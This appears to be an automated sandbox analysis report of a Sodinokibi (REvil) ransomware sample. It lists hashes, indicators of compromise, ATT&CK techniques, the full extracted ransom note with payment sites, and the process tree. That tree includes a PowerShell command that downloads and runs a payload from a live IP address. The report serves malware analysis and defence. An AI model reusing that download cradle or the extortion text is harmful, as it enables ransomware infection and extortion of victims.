sodinokibi | 9988e330f6441a383a3c4b89544670f2ea60dbb9c587cb938fe71dee77003391

General

Target

148191c5edb43b691f1df387dc563507.bat
Size

216B
MD5

136cfde5a2f54a7d8742d25570058e5c
SHA1

4c5f2992b01fa216311c261996c0ac751485f533
SHA256

9988e330f6441a383a3c4b89544670f2ea60dbb9c587cb938fe71dee77003391
SHA512

5328bc43411d7761f39c13c213cb10f6da9b81be55e8031ab77ca34fd1aeeac7d0290cd86ba0951d5f232e43fd3a738a54c601dd0c1518481750758e2611eca3

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507

Extracted

Path

C:\059f116e4g-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 059f116e4g. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+]WE HAVE STEALED YOUR DATA FROM SERVERS AND ARE READY TO PUBLISH THEM IN PUBLIC ACCESS (USE TOR BROWSER TO VIEW)[+] http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/146?s=af64e6481d5f3e44b6b5bfc04cfef40c [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3CE3B07FC7BDE577 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3CE3B07FC7BDE577 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Jyhp2aIoW9UCuQ81l3Cou20zE5bC66hy+CoClcSshghtbKXCstIojqa0BDx2tdan CVtA9U0JQLQuh/QJB6W4mSmm7NQ639XHp39s9exTSR4ZkdHi1cpWmvJZRBJxnspg 4QyDr5FcwalyA7MPTlko7NKC5ELZhTBhxSvFD/lkJ+Qq7vdtDsTKlsflAXgemCu6 41F82AQ96Iq+qP8WjUDCwbBPUdZ2poS5MhNL94xCtdeGF+5VqbXXlYQ0dxh589kr ZHv/2Ob/HlLWZAj5IWGQoXKHwMtxSxDdQa4Rn9yJ+dYuWTCDDGTFFJWKSpQ/Yam9 fSU+8LY6eQO6diDUEjmFETz4YoTjthEfNdB6LKa/MGNSMniHBr1Z+Wc2/20uJ9RS pAQbEw2Il8GJtMaokxsDNbhzrzgnD2C421r34ooGv9ZP5WNma+WiVsr3r+elBjvT UA8EEK6/KwzCkP8mTq0lkKyzEP8VAAPLYAsczV04dQkMZeBaLkj+wBWEqRBA1p9r pPYyC9ETT9aK7iYIRUSKYfhPtgKd/8nWefhzc+MyvPIuQx1i1ev9O3OwIxbD9gZ1 ZIPBezKRerIE02buB4V0fKPJrfUd18h+3U+nKETU1XvHru8ihlP8hDzfB5L5nBKA /ngUTB4uPuWFKdCOJByJU+ubEc3oBqAY7l4g95Y9xmGh4kScMKLEtW6g8F267yN0 mOZsN7qXxSg69r9YBtvUUS9NUOUnOQ+k5B3JmD/iGHggrHOjPMEMvntkzl5f7O19 EzIqlJ4p48grnhzo1/fY1zm/kRlFrazkMsiXXE8FMvTB0yu4eNQ6CkyryG3vVdlS NwfHnK008N1VEP4wUHPjzBGh652BfJGjpmoFYBTQ0922UFg6dtkZRhSiVmTTfICd EQThtravIVps2D2vkTGanvRoN4vOmMIdzpdmdEybOLTezy5cXQKJa3uwpKIj6AQg l2/kWDfwGmf9PUTdK+w8Kqu+OuJVnRWDthsasTSu/7wA0GctF/Q4MOIebwLZ5Qmv /rGDUCcOwW998m46LSKqWJnnLCNw7K296vjh1uUUWXAUkOBEODJLOLdB/K2HHZ9b AKWNgpc3P8ruv554nozBS8Zsx1a5cMYi3mJcZbytimDJ850MODsNWADV7E7i7TJZ 552uJgolcran5FZTawmR0YTljH4Lg3aYUxJlW325DGrop6gUNM0yV5YJnP4OWyi9 dDI/p1Y4B57V34YFojRAF9vsLGFffq0q+ycYiZ1Vprc2kkcM+pGwsT9vyzaUCyAO pY0zMLqtVqAYgcpNcIBsVIYBUCqMlejXPrnqHBg0fZAFSXk29P2xhw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3CE3B07FC7BDE577

http://decryptor.cc/3CE3B07FC7BDE577

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1420 powershell.exe

flow	pid	process
3	1420	powershell.exe

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\EnterLock.tif => \??\c:\users\admin\pictures\EnterLock.tif.059f116e4g	powershell.exe
File renamed	C:\Users\Admin\Pictures\JoinMove.png => \??\c:\users\admin\pictures\JoinMove.png.059f116e4g	powershell.exe
File renamed	C:\Users\Admin\Pictures\UpdateSave.tiff => \??\c:\users\admin\pictures\UpdateSave.tiff.059f116e4g	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\UpdateSave.tiff	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 5 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\yic35bu4p6l4.bmp"	powershell.exe

Drops file in Program Files directory 37 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\BlockUnlock.xlsx	powershell.exe
File opened for modification	\??\c:\program files\HideEnable.wdp	powershell.exe
File opened for modification	\??\c:\program files\HideMount.potm	powershell.exe
File opened for modification	\??\c:\program files\RevokeSkip.docx	powershell.exe
File opened for modification	\??\c:\program files\DebugEnable.htm	powershell.exe
File opened for modification	\??\c:\program files\StopResolve.htm	powershell.exe
File opened for modification	\??\c:\program files\SwitchResolve.TS	powershell.exe
File opened for modification	\??\c:\program files\UndoResume.pot	powershell.exe
File opened for modification	\??\c:\program files\UndoRedo.clr	powershell.exe
File opened for modification	\??\c:\program files\UpdateExport.doc	powershell.exe
File opened for modification	\??\c:\program files\CompressUnpublish.TTS	powershell.exe
File opened for modification	\??\c:\program files\DenyStep.ex_	powershell.exe
File opened for modification	\??\c:\program files\ExportRepair.htm	powershell.exe
File opened for modification	\??\c:\program files\MoveSkip.dxf	powershell.exe
File opened for modification	\??\c:\program files\RevokeExit.dib	powershell.exe
File opened for modification	\??\c:\program files\SearchExpand.zip	powershell.exe
File opened for modification	\??\c:\program files\WatchInitialize.ppt	powershell.exe
File created	\??\c:\program files\059f116e4g-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\059f116e4g-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompleteFormat.js	powershell.exe
File opened for modification	\??\c:\program files\ExpandInvoke.ttf	powershell.exe
File opened for modification	\??\c:\program files\SubmitUndo.pub	powershell.exe
File opened for modification	\??\c:\program files\UndoComplete.mp3	powershell.exe
File opened for modification	\??\c:\program files\DenyClear.dot	powershell.exe
File opened for modification	\??\c:\program files\FormatAssert.avi	powershell.exe
File opened for modification	\??\c:\program files\InvokeRegister.xla	powershell.exe
File opened for modification	\??\c:\program files\MoveEnable.mp4v	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\059f116e4g-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompressWatch.DVR	powershell.exe
File opened for modification	\??\c:\program files\GetRequest.mpg	powershell.exe
File opened for modification	\??\c:\program files\ImportCompare.wmf	powershell.exe
File opened for modification	\??\c:\program files\MeasureSearch.odp	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\059f116e4g-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UseProtect.rtf	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\059f116e4g-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConfirmOpen.htm	powershell.exe
File opened for modification	\??\c:\program files\ExportUse.jpe	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1420 powershell.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1420 powershell.exe
1420 powershell.exe
1420 powershell.exe

pid	process
1420	powershell.exe

pid	process
1420	powershell.exe
1420	powershell.exe
1420	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeTakeOwnershipPrivilege	1420	powershell.exe
Token: SeBackupPrivilege	1796	vssvc.exe
Token: SeRestorePrivilege	1796	vssvc.exe
Token: SeAuditPrivilege	1796	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 1324 wrote to memory of 1420	1324	cmd.exe	powershell.exe
PID 1324 wrote to memory of 1420	1324	cmd.exe	powershell.exe
PID 1324 wrote to memory of 1420	1324	cmd.exe	powershell.exe
PID 1324 wrote to memory of 1420	1324	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\148191c5edb43b691f1df387dc563507.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/148191c5edb43b691f1df387dc563507');Invoke-GCMRWEZUO;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1796

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1420-0-0x0000000000000000-mapping.dmp

Download
memory/1420-1-0x0000000073980000-0x000000007406E000-memory.dmp

Filesize
6.9MB

Download
memory/1420-2-0x0000000002370000-0x0000000002371000-memory.dmp

Filesize
4KB

Download
memory/1420-3-0x00000000047C0000-0x00000000047C1000-memory.dmp

Filesize
4KB

Download
memory/1420-4-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1420-5-0x0000000005280000-0x0000000005281000-memory.dmp

Filesize
4KB

Download
memory/1420-8-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

Filesize
4KB

Download
memory/1420-13-0x00000000060C0000-0x00000000060C1000-memory.dmp

Filesize
4KB

Download
memory/1420-14-0x0000000006220000-0x0000000006221000-memory.dmp

Filesize
4KB

Download
memory/1420-21-0x00000000061F0000-0x00000000061F1000-memory.dmp

Filesize
4KB

Download
memory/1420-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads